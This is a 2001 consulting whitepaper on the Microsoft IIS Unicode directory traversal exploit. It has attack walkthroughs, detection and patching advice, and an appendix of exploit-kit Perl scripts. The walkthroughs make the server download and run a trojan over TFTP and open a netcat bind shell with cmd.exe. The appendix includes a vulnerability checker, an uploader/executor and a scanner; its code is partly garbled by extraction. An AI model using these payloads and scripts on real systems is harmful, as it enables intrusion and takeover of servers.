Microsoft IIS Unicode Exploit
|
|
|
- Roger Gaines
- 10 years ago
- Views:
Transcription
1 Microsoft IIS Unicode Exploit By Nate Miller Member of Consulting Staff Lucent Technologies Worldwide Services
2 Microsoft IIS Unicode Exploit By Nate Miller, Lucent Technologies Worldwide Services Introduction Unicode attempts to be a comprehensive solution for electronically mapping all the characters of the world's languages, allowing a theoretical total of over 65,000 characters in its 16-bit character definition. There have been two independent attempts to create a single, unified character set. One was the ISO project of the International Organization for Standardization (ISO); the other was the Unicode Project organized by a consortium of manufacturers of multi-lingual software. They eventually joined efforts to create a single code table. Unicode extensions are installed by default with Microsoft Internet Information Server (IIS) versions 4.0 and 5.0. This is to allow characters that are not used in the English Language to be recognized by web servers. The IIS Unicode Exploit allows users to run arbitrary commands on the web server. IIS servers with the Unicode extensions loaded are vulnerable unless they are running current patches. This paper will explain in detail how this seemingly harmless service can lead to a system compromise, and what can be done to minimize that vulnerability. Analysis of the Exploit The Unicode exploit is not new, but rather a variation on an old vulnerability called the Dot Dot attack. The Dot Dot attack occurs when an attacker sends a malformed URL to a web server that looks something like this: The attack itself is relatively simple to understand: the web server will just look for the file in the web-root directory called../../../../../winnt/repair/sam._. The../ tells the web server to look up one directory, so five../ s in a row will make the web server look in the document root for a file called winnt/repair/sam._. The number of../ s does not matter as long as there are enough of them to recurse back to the root of the file system (either c:\ or / on Unix systems). The IIS Unicode exploit uses the http protocol and malformed URLs to traverse directories and execute arbitrary commands on vulnerable web servers, much like the Dot Dot attack. The IIS Unicode exploit uses a Unicode representation of a directory delimiter ( / ) to fool IIS into doing the same thing as the old Dot Dot attack. The fix to the Dot Dot attack does not recognize the Unicode representation of the slash, which is why this exploit works. Microsoft IIS Unicode Exploit August 2001 Lucent Technologies Worlwide Services - 2 -
3 Because the exploit uses http, it can be made to work right from the Address bar of a browser. This is in fact the easiest way to exploit the vulnerability, but scripting the attack makes it more efficient and powerful. The following example (Figure 1) shows a non-destructive command being run from the browser Address bar, which displays the directory listing of the c:\ directory of a web server. Because of the non-interactive nature of this exploit, interactive commands such as ftp and telnet don t work very well. We will see later how it is possible to run commands interactively using this exploit as a first step. Figure 1: Browser Address Bar Attack This is a simple example of the Unicode Exploit using a web browser. Note that the output of the command dir c:\ is displayed in the browser window. Microsoft IIS Unicode Exploit August 2001 Lucent Technologies Worlwide Services - 3 -
4 To understand the actual attack, one must closely examine a sample of the exploit. The following URL was run on a vulnerable machine on the Internet. The URL will run the command dir c:\ and return the output as a web page. Let s examine the URL: (the IP address has been modified to protect server identity) Moving from left to right, the first thing we notice is that the URL calls something from the /scripts directory on the server For this particular version of the attack, the scripts directory (or another directory which has execute permissions such as cgi-bin) must exist and the path to the executable cmd.exe must be correct. The next thing we see is..%c0%af. The string of characters %c0%af is an overlong Unicode representation for '/'. If the Unicode extension is loaded on the server, the URL will be interpreted to be: Analyzing the URL in this form makes it a little more obvious what is going on here. This is exactly like the old Dot Dot attack. The URL backs out of the web root, to the root directory of the server, then calls \winnt\system32\cmd.exe with the parameters dir and C:\. We are using the command interpreter (cmd.exe) to execute the command dir c:\. The resulting directory listing is displayed in Figure 1. Any command that can be executed by the user IUSR_machinename can be run by crafting the appropriate URL and entering it into the address bar. The IUSR_machinename user has approximately the same rights as a normal user who logs on interactively at the console. It is important to note that this exploit does not give the attacker Administrative level access unless the server has been mis-configured and runs as an Administrative user. There are, however, ways that attackers can elevate their access to Administratuve level, using this exploit as a first step. Other vulnerabilities would have to be exploited in order to gain administrative access, but once attackers have any level of access to the Operating System, it is usually relatively easy for them to gain administrative privileges. The exploit works because of how, and more importantly when, an unpatched IIS server interprets the Unicode characters. It seems that IIS interprets Unicode characters after it does path checking. We see that substituting a / for the %c0%af will result in a 404 error on the web server. We can deduce from this output that IIS checks the path before interpreting the Unicode /. Microsoft IIS Unicode Exploit August 2001 Lucent Technologies Worlwide Services - 4 -
5 Figure 2: 404 Error The following diagram illustrates how an attack might happen. The attack is an example of what a typical attacker might do once a vulnerable server is discovered. The diagram illustrates an attacker causing the victim server to download a file via TFTP, and then executing the file. Figure 3: Exploit Process Microsoft IIS Unicode Exploit August 2001 Lucent Technologies Worlwide Services - 5 -
6 1 2 WEB Browser TFTP Server Vulnerable IIS Web Server From a web browser, the attacker determines that the Web Server running on is vulnerable to the Unicode Exploit. Once this is determined, attackers will typically try to elevate their privileges. This can be done easily by downloading other malicious code or a trojan horse program from another location using tftp. 2. Attackers craft a URL that causes the web server to use tftp to download a file from the server The TFTP server sends the trojan program to the web server. 4. Attackers then execute the program remotely, agian using the web browser and the Unicode exploit to run the command. 5. Attackers now have full control over the web server using the trojan program. How the Exploit is Used This exploit is bound only by the attacker s creativity. Any command that IUSR_machinename can execute can be made to run using this exploit. Downloading and executing files is probably the most desirable result for an attacker. A good example of this type of attack might be a Trojan horse program such as Netbus or Back Orifice. Trojan horse programs usually give attackers an elevated privilege level. If programs can be successfully downloaded and executed, users can run any exploit code to elevate their privileges. There are many small precompiled binaries that, when run on a system, add a user to the Administrators group, or allow commands to be run with Administrator privileges. Attackers often target the SAM database on Windows NT and Windows 2000 machines. In order to dump the SAM database, a user must have Administrativelevel access to the machine. Privilege escalation would be a common goal of an attacker using the Unicode Exploit because of the relatively low privilege level of the IUSR_machinename account. The exploit can be carried out completely using the browser s URL bar, however, scripts have been written to automate the entire process. There have also been many scripts written that automate the process of finding vulnerable servers, as well as automating the process of uploading malicious code to the vulnerable servers. Following in this section are many possible ways to exploit the Unicode vulnerability. Most of these are ways to upload and execute programs to the vulnerable server. The three methods that will be discussed are TFTP, net use, and automated scripts. TFTP Exploit Method An example of an easy way to download files using the Unicode exploit would be to type the following URL into the address bar of a browser, which will cause the server to download a file using TFTP called Trojan.exe from the server xxx.xxx.xxx.xxx and saves the file to c:\winnt\system32\trojan.exe. Microsoft IIS Unicode Exploit August 2001 Lucent Technologies Worlwide Services - 6 -
7 i"+xxx.xxx.xxx.xxx+get+trojan.exe+c:\winnt\system32\trojan.exe Once the file Trojan.exe resides on the server, the attacker can then execute the Trojan with the URL: If the file Trojan.exe were Netbus or Back Orifice, the server would then be infected and completely vulnerable. These Trojans do not require a high level of access to be installed, but give the Trojan user complete control over the infected system. Net Use Exploit Method An attacker could also achieve the desired result by mounting or accessing a share over the Internet. It should be noted that this will not work if NetBios is not installed on the vulnerable server or filtered anywhere along the way. The URL used to do this would look similar to the following: me\sharename These attacks would be more complex and less reliable than using TFTP, but it should be mentioned that this is also a possibility. Once a share is mounted, files could be copied and uploaded or downloaded by the attacker. Uploaded files could be executed much like the URL listed above in the TFTP section. Automated Script Exploit Method Many examples of automated scripts are available from Packetstorm. The script that we will examine more closely here is located at: This script was chosen because of its particularly good documentation and completeness. This zip file contains everything you need to exploit a vulnerable IIS server. The zip archive contains the Perl scripts to test if a server is vulnerable, a Trojan program that will open a backdoor on the compromised server, and a TFTP server for you to run on your local box. The first step in this type of exploit is to determine vulnerable servers. This particular exploit program has a Perl script that can determine if hosts are vulnerabl;, the script is called uni.pl. A user would scan a range of IP addresses using this or a similar tool to determine quickly which servers are vulnerable to this exploit. The second step is to then make the target server download a precompiled executable file called ncx99.exe. This exploit provides a TFTP server that runs on Windows platforms, and detailed instructions for setting up the server so that remote TFTP clients can download the file. The attacker would then use another Perl script, uniexe.pl, to cause the server to download the file from a TFTP server. The final step in the exploit is to execute the file that you just uploaded to the vulnerable server. This can also be done using the uniexe.pl script. The Perl code for uni.pl and uniexe.pl can be found in the Source Code/Pseudo Code section. Microsoft IIS Unicode Exploit August 2001 Lucent Technologies Worlwide Services - 7 -
8 Once the ncx99.exe file has been executed on the target server, the attacker can then use telnet or netcat to connect directly to port 99 with no authentication. This gives direct command-line access to the target machine that is not logged via the IIS logs. The ncx99.exe executable acts like a telnet server running on port 99. The executable is probably nothing more than a modified netcat that needs no switches or options. Using the standard netcat executable with the following options would do the same thing: nc -l -p 99 -t -e cmd.exe This command tells netcat to listen to port 99 and when it receives a connection, run cmd.exe. This effectively opens a telnet server on port 99 that requires no authentication. Once an attacker has command-line access to the machine, the attacker can download other code, such as getadmin.exe or other similar privilege-elevating code to gain administrative-level access. There are several binaries available on the Internet that will add a particular user to the administrators group, or allow any user to execute commands with administrative-level privileges. Many of these exploits will work well on a Windows 2000 SP1 machine and use the named pipe vulnerability. There are, of course, many other things malicious attackers might do once they get access to the server. The three most likely targets are data integrity, availability, and confidentiality. Once this attack has compromised a system, it is very difficult to ensure data integrity. Attackers often leave back doors into systems they have compromised to facilitate their return later. Attackers often delete logs and turn off auditing to cover their tracks. There are many ways to compromise a system s integrity, but very few ways to know for sure what an attacker has done to a system after initial compromise. At the time of this writing, many people are exploiting this vulnerability and using it to do one of two things. Hosts that have been exploited using this vulnerability are often used to scan and attack for other vulnerable hosts. By hopping through many compromised hosts before launching an attack, the attacker makes it more difficult to detect the true source address. This vulnerability has also been incorporated into a new worm that affects both Microsoft IIS and Solaris platforms. The other common use of exploited hosts is as a zombie for use in denial of service attacks. Because of the large number of vulnerable hosts, attackers have used compromised hosts to build a flood network. Attack Signature Because we are using the web server to perform commands, odd-looking URL requests will show up in the IIS logs (assuming that the web server is logging accesses). The exploit will generate entries in the log similar to the following: :59: GET /scripts/../../winnt/system32/cmd.exe /c+dir+c:\ 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+NT+5.0) :59: GET /scripts/../../winnt/system32/cmd.exe /c+dir+c:%5c 200 Mozilla/4.74+[en]+(Windows+NT+5.0;+U) :00: GET /scripts/../../winnt/system32/cmd.exe /c+dir+c:\ 200 Mozilla/4.0+(compatible;+MSIE+5.01;+Windows+NT+5.0) :39: GET /scripts/../../winnt/system32/cmd.exe /c+dir+c:\ 200 Mozilla/4.0+(compatible; Microsoft IIS Unicode Exploit August 2001 Lucent Technologies Worlwide Services - 8 -
9 Identifying what the attacker is doing (or trying to do) is quite obvious from the URL in the logs. Note that the logs do not print out the Unicode representation of the slash, but the Interpreted Unicode ( / ). This may confuse someone who tries to paste this into his or her browser because it generates a 404 error. This may give the person a false sense of confidence that a system has not been compromised, when in fact, it has. Note that the server would return a code 200, which indicates that the GET command was processed successfully. This indicates that the server fulfilled the request and that the system has been compromised. The best way to tell if your server has been compromised is to keep a close eye on the logs. There is no telltale log entry that will tell you if you have been compromised or scanned for this vulnerability because of the wide range of possibilities of compromise. However, if any log entries contain exe or the telltale slashes accompanied by a server code 200, the system should be investigated immediately to determine the likelihood and the severity of the compromise. It is also very important to look for any large time gaps when there are no log entries, because this also a sure sign that log entries have been deleted. Attackers will try to cover their tracks to keep from being detected, especially if it is easy to tell where the attack originated. This is a good reason to have logs in two separate places for any server that is accessible to the Internet. How to Protect Your System The best method to protect against this exploit is to update the patches on your server. Microsoft issued a patch in (Month? 2001) that fixed the problem, although the patch was actually meant to fix a different problem. The patch was issued to fix file permissions problems. Microsoft has released Security Bulletin MS Web Server Folder Transversal to warn of the problem. The bulletin explains that patch MS ("File Permission Canonicalization") fixes this problem. This patch should be applied immediately if your web server is found to be vulnerable. It is important to closely follow security bulletins and patches issued by Microsoft, even if you may not think that the patch will affect your systems. This exploit proves that point. The patch that fixes the problem was issued in August of 2000, and the exploit came out in mid-october There are still many servers out there that have not been patched, and therefore are vulnerable. Direct links to patches can be found at the following URLs: IIS IIS Conclusion The Unicode vulnerability affects many IIS 4.0 and 5.0 web servers, and is currently the most common attack used to compromise IIS web servers. Because of the relative ease of carrying out this attack, Microsoft IIS Servers (which comprise less than one-third of Internet web servers) now make up about two-thirds of the total number of compromised web servers according to Microsoft IIS Unicode Exploit August 2001 Lucent Technologies Worlwide Services - 9 -
10 attrition.org. Simply maintaining current patch levels could prevent nearly all system compromises. About Lucent Technologies Worldwide Services Lucent Technologies Worldwide Services offers service providers and enterprises a comprehensive portfolio of network services and software solutions for the full network lifecycle, including planning and design, implementation, and operations. Lucent Services provides consulting services, technical support services, mobility solution services, engineering and installation services, and software solutions for network and application performance management. Lucent Technologies is headquartered in Murray Hill, New Jersey, USA. Visit the Lucent Web site at For information regarding Lucent Services network services and software solutions capabilities, call Lucent in the U.S., or outside the U.S., or [email protected]. Copyright 2001, Lucent Technologies Worldwide Services This is an unpublished work protected under the copyright laws. All trademarks and registered trademarks are properties of their respective holders. All rights reserved. Printed in U.S.A. Lucent Technologies, Inc. Microsoft IIS Unicode Exploit August 2001 Lucent Technologies Worlwide Services
11 Appendix The following scripts are Perl scripts contained in the NIT_Unicode exploit kit mentioned above. Uni.pl #!/usr/bin/perl # Use this perl script to identify if the host is vulnerable! # "WHO LET THEM DOGS OUT" # Usage: perl uni.pl IP:port # Only makes use of "Socket" library # This does 14 different checks. Have Fun! use Socket; # init if ($#ARGV<0) {die "UNICODE-CHECK Example: c:\\perl uni.pl {OR {if the host is not using a proxy c:\\perl uni.pl :80\n"; ($host,$port)=split(/:/,@argv[0]); print "Trying... \n"; $target = inet_aton($host); $flag=0; # test method 1 /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0\r\n\r\n"); if ($line =~ /Directory/) {$flag=1; # test method 2 /scripts..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0\r\n\r\n"); Microsoft IIS Unicode Exploit August 2001 Whitepaper Appendix A 1
12 if ($line =~ /Directory/) {$flag=1; # test method 3 /scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir HTTP/1.0\r\n\r\n"); if ($line =~ /Directory/) {$flag=1; # test method 4 /scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir HTTP/1.0\r\n\r\n"); if ($line =~ /Directory/) {$flag=1; # test method 5 /scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir HTTP/1.0\r\n\r\n"); if ($line =~ /Directory/) {$flag=1; # test method 6 /scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir HTTP/1.0\r\n\r\n"); if ($line =~ /Directory/) {$flag=1; # test method 7 /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0\r\n\r\n"); if ($line =~ /Directory/) {$flag=1; # test method 8 /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0\r\n\r\n"); if ($line =~ /Directory/) {$flag=1; Microsoft IIS Unicode Exploit August 2001 Whitepaper Appendix A 2
13 # test method 9 /scripts/..%c1%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0\r\n\r\n"); if ($line =~ /Directory/) {$flag=1; # test method 10 /scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0\r\n\r\n"); if ($line =~ /Directory/) {$flag=1; # test method 11 /scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0\r\n\r\n"); if ($line =~ /Directory/) {$flag=1; # test method 12 /scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0\r\n\r\n"); if ($line =~ /Directory/) {$flag=1; # test method 13 /scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0\r\n\r\n"); if ($line =~ /Directory/) {$flag=1; # test method 14 /msadc/..\%e0\%80\%af../..\%e0\%80\%af../..\%e0\%80\%af../winnt/system32 /cmd.exe\?/c\+dir HTTP/1.0\r\n\r\n"); if ($line =~ /Directory/) {$flag=1; Microsoft IIS Unicode Exploit August 2001 Whitepaper Appendix A 3
14 # result if ($flag==1){print "<THIS HOST IS VULNERABLE> :-)\n USE unicodexecute2.pl from else {print "<THIS HOST IS NOT VULNERABLE> :-( \n"; # Sendraw - thanx RFP [email protected] sub sendraw { # this saves the whole transaction anyway my ($pstr)=@_; socket(s,pf_inet,sock_stream,getprotobyname('tcp') 0) die("socket problems\n"); if(connect(s,pack "SnA4x8",2,$port,$target)){ select(s); $ =1; print $pstr; while(<s>){ $_; select(stdout); close(s); else { die("can't connect...\n"); #NIT IN THE YEAR 2000 Uniexe.pl #!/usr/bin/perl # This is for educational purpose's only! # WHO LET THEM DOGS OUT! # Use uni.pl first to see if this is a vulnerable server! # Based of the script unicodeexecute.pl from Roelof Temmngh # Files=uniexe.pl,uni.pl,readme.file,tftpd32.exe,exploit.readme use Socket; if ($#ARGV<0) {die "Usage: uniexe.pl IP:port command\n"; ($host,$port)=split(/:/,@argv[0]); $target = inet_aton($host); Microsoft IIS Unicode Exploit August 2001 Whitepaper Appendix A 4
15 $failed=1; /scripts/..%c0%af../winnt/system32/cmd.exe?/c+$command HTTP/1.0\r\n\r\n\cls"); if ($line =~ /nit.exe/) {$failed=0; $failed2=1; if ($failed==1) { #You need to change the xxx.xxx.xxx.xxx to your ip address. Duh! $command="tuft -i xxx.xxx.xxx.xxx GET ncx99.exe c:\\inetpub\\scripts\\nit.exe"; $command=~s/ /scripts/..%c0%af../winnt/system32/cmd.exe?/c+$command HTTP/1.0\r\n\r\n"); foreach $line2 (@results2){ if (($line2 =~ /nit.exe/ )) {$failed2=0; $command=@argv[1]; print "\n Hit CTRL-C if this is Hanging"; $command=~s/ /\%20/g; /scripts/..%c0%af../winnt/system32/cmd.exe?/c+$command HTTP/1.0\r\n\r\n"); # Sendraw - thanx RFP [email protected] sub sendraw { # this saves the whole transaction anyway my ($pstr)=@_; socket(s,pf_inet,sock_stream,getprotobyname('tcp') 2) Microsoft IIS Unicode Exploit August 2001 Whitepaper Appendix A 5
16 die("socket problems\n"); if(connect(s,pack "SnA4x8",2,$port,$target)){ select(s); $ =1; print $pstr; while(<s>){ $_; select(stdout); close(s); else { die("can't connect...\n"); # NIT IN THE YEAR 2000 MDAC-scan.pl #!/usr/bin/perl # # # No comments. # # #Phreak.nl # # -- Xphere -- use Socket; $SIG{'ALRM' = sub { exit(0) ; $SIG{'CHLD' = sub { wait ; if ($#ARGV == 1) { else { $in = $ARGV[0]; $out = $ARGV[1]; print "\n\e[0;34m[ MDAC scanner by: Xphere -- #Phreak.nl ]\e[0m\n\n"; print "Usage: $0 <host_list> <log_file> &\n"; exit(0); Microsoft IIS Unicode Exploit August 2001 Whitepaper Appendix A 6
17 open(in, "$in") die "Can't open $in!"; open(out, ">>$out") die "Can't create $out!"; while (<IN>) { chomp($line = $_); if ($line =~ /(\S*)/) { if ($pid = fork) { sleep 10; elsif (defined($pid)) { alarm(25); checkh($1); alarm(0); exit(0); sub checkh { my ($server) my ($port) = 80; chop($hostname = 'hostname'); ($name, $aliases, $proto) = getprotobyname('tcp'); ($name, $aliases, $port) = getservbyname($port,'tcp') unless $port =~ /^\d+$/; ($name, $aliases, $type, $len, $thisaddr) = gethostbyname($hostname); ($name, $aliases, $type, $len, $thataddr) = gethostbyname($server); socket(s, AF_INET, SOCK_STREAM, $proto); $sockaddr = 'S n a4 x8'; $this = pack($sockaddr, AF_INET, 0, $thisaddr); $that = pack($sockaddr, AF_INET, $port, $thataddr); if (bind(s, $this) && connect(s, $that)) { Microsoft IIS Unicode Exploit August 2001 Whitepaper Appendix A 7
18 select(s); $ =1; print S "GET \/msadc\/msadcs.dll HTTP\/1.0\r\n\r\n"; while (<S>) { chomp($serv = $_); if ($serv =~ /^HTTP\/1\.1\s200\sOK/i) { print OUT "$server runs MDAC.\n" close(s); sleep 15; close(in); close(out); Microsoft IIS Unicode Exploit August 2001 Whitepaper Appendix A 8
19 References Attrition Web Site defacement mirror: Microsoft Security Bulletins: Microsoft Security Bulletin MS00-057: Microsoft Security Bulletin MS00-078: Rain Forest Puppy write-up of the Unicode exploit: Example of Automated exploit: Xforce write-up on the subject: Microsoft IIS Unicode Exploit August 2001 Whitepaper Appendix A 9
SECUREIT.CO.IL. Tutorial. NetCat. Security Through Hacking. NetCat Tutorial. Straight forward, no nonsense Security tool Tutorials
SECUREIT.CO.IL Tutorial NetCat Security Through Hacking NetCat Tutorial Straight forward, no nonsense Security tool Tutorials SECUREIT.CO.IL SECURITY THROUGH HACKING NetCat The Swiss Army Knife SecureIT.co.il
Make a folder named Lab3. We will be using Unix redirection commands to create several output files in that folder.
CMSC 355 Lab 3 : Penetration Testing Tools Due: September 31, 2010 In the previous lab, we used some basic system administration tools to figure out which programs where running on a system and which files
A Roadmap for Securing IIS 5.0
This document was grafted together from various Web and other sources by Thomas Jerry Scott for use in his Web and other Security courses. Jerry hopes you find this information helpful in your quest to
How to detect hackers on your web server
How to detect hackers on your web server Catch hackers red handed through real-time security event log monitoring A discussion of the methods used by hackers to attack IIS web servers, and how you can
FREQUENTLY ASKED QUESTIONS
FREQUENTLY ASKED QUESTIONS Secure Bytes, October 2011 This document is confidential and for the use of a Secure Bytes client only. The information contained herein is the property of Secure Bytes and may
Penetration Testing Report Client: Business Solutions June 15 th 2015
Penetration Testing Report Client: Business Solutions June 15 th 2015 Acumen Innovations 80 S.W 8 th St Suite 2000 Miami, FL 33130 United States of America Tel: 1-888-995-7803 Email: [email protected]
Web Application Threats and Vulnerabilities Web Server Hacking and Web Application Vulnerability
Web Application Threats and Vulnerabilities Web Server Hacking and Web Application Vulnerability WWW Based upon HTTP and HTML Runs in TCP s application layer Runs on top of the Internet Used to exchange
Manipulating Microsoft SQL Server Using SQL Injection
Manipulating Microsoft SQL Server Using SQL Injection Author: Cesar Cerrudo ([email protected]) APPLICATION SECURITY, INC. WEB: E-MAIL: [email protected] TEL: 1-866-9APPSEC 1-212-947-8787 INTRODUCTION
Penetration Testing. NTS330 Unit 1 Penetration V1.0. February 20, 2011. Juan Ortega. Juan Ortega, [email protected]. 1 Juan Ortega, juaorteg@uat.
1 Penetration Testing NTS330 Unit 1 Penetration V1.0 February 20, 2011 Juan Ortega Juan Ortega, [email protected] 1 Juan Ortega, [email protected] 2 Document Properties Title Version V1.0 Author Pen-testers
HoneyBOT User Guide A Windows based honeypot solution
HoneyBOT User Guide A Windows based honeypot solution Visit our website at http://www.atomicsoftwaresolutions.com/ Table of Contents What is a Honeypot?...2 How HoneyBOT Works...2 Secure the HoneyBOT Computer...3
Firewalls and Software Updates
Firewalls and Software Updates License This work by Z. Cliffe Schreuders at Leeds Metropolitan University is licensed under a Creative Commons Attribution-ShareAlike 3.0 Unported License. Contents General
IceWarp to IceWarp Server Migration
IceWarp to IceWarp Server Migration Registered Trademarks iphone, ipad, Mac, OS X are trademarks of Apple Inc., registered in the U.S. and other countries. Microsoft, Windows, Outlook and Windows Phone
Smartphone Pentest Framework v0.1. User Guide
Smartphone Pentest Framework v0.1 User Guide 1 Introduction: The Smartphone Pentest Framework (SPF) is an open source tool designed to allow users to assess the security posture of the smartphones deployed
Web Application Vulnerability Testing with Nessus
The OWASP Foundation http://www.owasp.org Web Application Vulnerability Testing with Nessus Rïk A. Jones, CISSP [email protected] Rïk A. Jones Web developer since 1995 (16+ years) Involved with information
Recommended Practice Case Study: Cross-Site Scripting. February 2007
Recommended Practice Case Study: Cross-Site Scripting February 2007 iii ACKNOWLEDGEMENT This document was developed for the U.S. Department of Homeland Security to provide guidance for control system cyber
1 Recommended Readings. 2 Resources Required. 3 Compiling and Running on Linux
CSC 482/582 Assignment #2 Securing SimpleWebServer Due: September 29, 2015 The goal of this assignment is to learn how to validate input securely. To this purpose, students will add a feature to upload
What Do You Mean My Cloud Data Isn t Secure?
Kaseya White Paper What Do You Mean My Cloud Data Isn t Secure? Understanding Your Level of Data Protection www.kaseya.com As today s businesses transition more critical applications to the cloud, there
IceWarp Unified Communications. AntiVirus Reference. Version 10.4
IceWarp Unified Communications AntiVirus Reference Version 10.4 Printed on 13 January, 2012 Contents AntiVirus 1 Anti-Virus... 2 Latest Avast! Engine... 2 Kaspersky Anti-Virus Support... 2 Support for
ANNEXURE-1 TO THE TENDER ENQUIRY NO.: DPS/AMPU/MIC/1896. Network Security Software Nessus- Technical Details
Sub: Supply, Installation, setup and testing of Tenable Network Security Nessus vulnerability scanner professional version 6 or latest for scanning the LAN, VLAN, VPN and IPs with 3 years License/Subscription
Web Plus Security Features and Recommendations
Web Plus Security Features and Recommendations (Based on Web Plus Version 3.x) Centers for Disease Control and Prevention National Center for Chronic Disease Prevention and Health Promotion Division of
6WRUP:DWFK. Policies for Dedicated IIS Web Servers Group. V2.1 policy module to restrict ALL network access
OKENA 71 Second Ave., 3 rd Floor Waltham, MA 02451 Phone 781 209 3200 Fax 781 209 3199 6WRUP:DWFK Policies for Dedicated IIS Web Servers Group The policies shipped with StormWatch address both application-specific
Using Internet or Windows Explorer to Upload Your Site
Using Internet or Windows Explorer to Upload Your Site This article briefly describes what an FTP client is and how to use Internet Explorer or Windows Explorer to upload your Web site to your hosting
6WRUP:DWFK. Policies for Dedicated SQL Servers Group
OKENA 71 Second Ave., 3 rd Floor Waltham, MA 02451 Phone 781 209 3200 Fax 781 209 3199 6WRUP:DWFK Policies for Dedicated SQL Servers Group The sample policies shipped with StormWatch address both application-specific
Code Estimation Tools Directions for a Services Engagement
Code Estimation Tools Directions for a Services Engagement Summary Black Duck software provides two tools to calculate size, number, and category of files in a code base. This information is necessary
2 Advanced Session... Properties 3 Session profile... wizard. 5 Application... preferences. 3 ASCII / Binary... Transfer
Contents I Table of Contents Foreword 0 Part I SecEx Overview 3 1 What is SecEx...? 3 2 Quick start... 4 Part II Configuring SecEx 5 1 Session Profiles... 5 2 Advanced Session... Properties 6 3 Session
NCS 430 Penetration Testing Lab #2 Tuesday, February 10, 2015 John Salamy
1 NCS 430 Penetration Testing Lab #2 Tuesday, February 10, 2015 John Salamy 2 Item I. (What were you asked to do?) Complete Metasploit: Quick Test on page 88-108 of the Penetration Testing book. Complete
Avaya Network Configuration Manager User Guide
Avaya Network Configuration Manager User Guide May 2004 Avaya Network Configuration Manager User Guide Copyright Avaya Inc. 2004 ALL RIGHTS RESERVED The products, specifications, and other technical information
Frequently Asked Questions. Secure Log Manager. Last Update: 6/25/01. 6303 Barfield Road Atlanta, GA 30328 Tel: 404.236.2600 Fax: 404.236.
Frequently Asked Questions Secure Log Manager Last Update: 6/25/01 6303 Barfield Road Atlanta, GA 30328 Tel: 404.236.2600 Fax: 404.236.2626 1. What is Secure Log Manager? Secure Log Manager (SLM) is designed
Security Correlation Server Quick Installation Guide
orrelogtm Security Correlation Server Quick Installation Guide This guide provides brief information on how to install the CorreLog Server system on a Microsoft Windows platform. This information can also
Hacking Database for Owning your Data
Hacking Database for Owning your Data 1 Introduction By Abdulaziz Alrasheed & Xiuwei Yi Stealing data is becoming a major threat. In 2012 alone, 500 fortune companies were compromised causing lots of money
N-CAP Users Guide Everything You Need to Know About Using the Internet! How Firewalls Work
N-CAP Users Guide Everything You Need to Know About Using the Internet! How Firewalls Work How Firewalls Work By: Jeff Tyson If you have been using the internet for any length of time, and especially if
Medical Device Security Health Imaging Digital Capture. Security Assessment Report for the Kodak DryView 8150 Imager Release 1.0.
Medical Device Security Health Imaging Digital Capture Security Assessment Report for the Kodak DryView 8150 Imager Release 1.0 Page 1 of 9 Table of Contents Table of Contents... 2 Executive Summary...
imhosted Web Hosting Knowledge Base
imhosted Web Hosting Knowledge Base CGI, Perl, Sendmail Category Contents CGI, Perl, Sendmail 1 What directory do I upload my CGI scripts to? 1 What is CGI? 1 What is Perl? 1 Do you allow CGI to run on
The Microsoft JPEG Vulnerability and the Six New Content Security Requirements
The Microsoft JPEG Vulnerability and the Six New Content Security Requirements Table of Contents OVERVIEW...3 1. THE VULNERABILITY DESCRIPTION...3 2. NEEDED: A NEW PARADIGM IN CONTENT SECURITY...4 3. PRACTICAL
External Vulnerability Assessment. -Technical Summary- ABC ORGANIZATION
External Vulnerability Assessment -Technical Summary- Prepared for: ABC ORGANIZATI On March 9, 2008 Prepared by: AOS Security Solutions 1 of 13 Table of Contents Executive Summary... 3 Discovered Security
Network- vs. Host-based Intrusion Detection
Network- vs. Host-based Intrusion Detection A Guide to Intrusion Detection Technology 6600 Peachtree-Dunwoody Road 300 Embassy Row Atlanta, GA 30348 Tel: 678.443.6000 Toll-free: 800.776.2362 Fax: 678.443.6477
Secure Web Development Teaching Modules 1. Security Testing. 1.1 Security Practices for Software Verification
Secure Web Development Teaching Modules 1 Security Testing Contents 1 Concepts... 1 1.1 Security Practices for Software Verification... 1 1.2 Software Security Testing... 2 2 Labs Objectives... 2 3 Lab
ABC LTD EXTERNAL WEBSITE AND INFRASTRUCTURE IT HEALTH CHECK (ITHC) / PENETRATION TEST
ABC LTD EXTERNAL WEBSITE AND INFRASTRUCTURE IT HEALTH CHECK (ITHC) / PENETRATION TEST Performed Between Testing start date and end date By SSL247 Limited SSL247 Limited 63, Lisson Street Marylebone London
Sophos Anti-Virus for Mac OS X Help
Sophos Anti-Virus for Mac OS X Help For networked and standalone Macs running Mac OS X Product version: 9 Document date: June 2013 Sophos TOC 3 Contents About Sophos Anti-Virus...5 About the Scans window...5
Integrated Network Vulnerability Scanning & Penetration Testing SAINTcorporation.com
SAINT Integrated Network Vulnerability Scanning and Penetration Testing www.saintcorporation.com Introduction While network vulnerability scanning is an important tool in proactive network security, penetration
HP Operations Orchestration Software
HP Operations Orchestration Software Software Version: 9.00 HP Project and Portfolio Management Integration Guide Document Release Date: June 2010 Software Release Date: June 2010 Legal Notices Warranty
TECHNICAL NOTE 01/02 PROTECTING YOUR COMPUTER NETWORK
TECHNICAL NOTE 01/02 PROTECTING YOUR COMPUTER NETWORK 2002 This paper was previously published by the National Infrastructure Security Co-ordination Centre (NISCC) a predecessor organisation to the Centre
SCP - Strategic Infrastructure Security
SCP - Strategic Infrastructure Security Lesson 1 - Cryptogaphy and Data Security Cryptogaphy and Data Security History of Cryptography The number lock analogy Cryptography Terminology Caesar and Character
Worms, Trojan Horses and Root Kits
Worms, Trojan Horses and Root Kits Worms A worm is a type of Virus that is capable of spreading and replicating itself autonomously over the internet. Famous Worms Morris Internet worm (1988) Currently:
CSE331: Introduction to Networks and Security. Lecture 32 Fall 2004
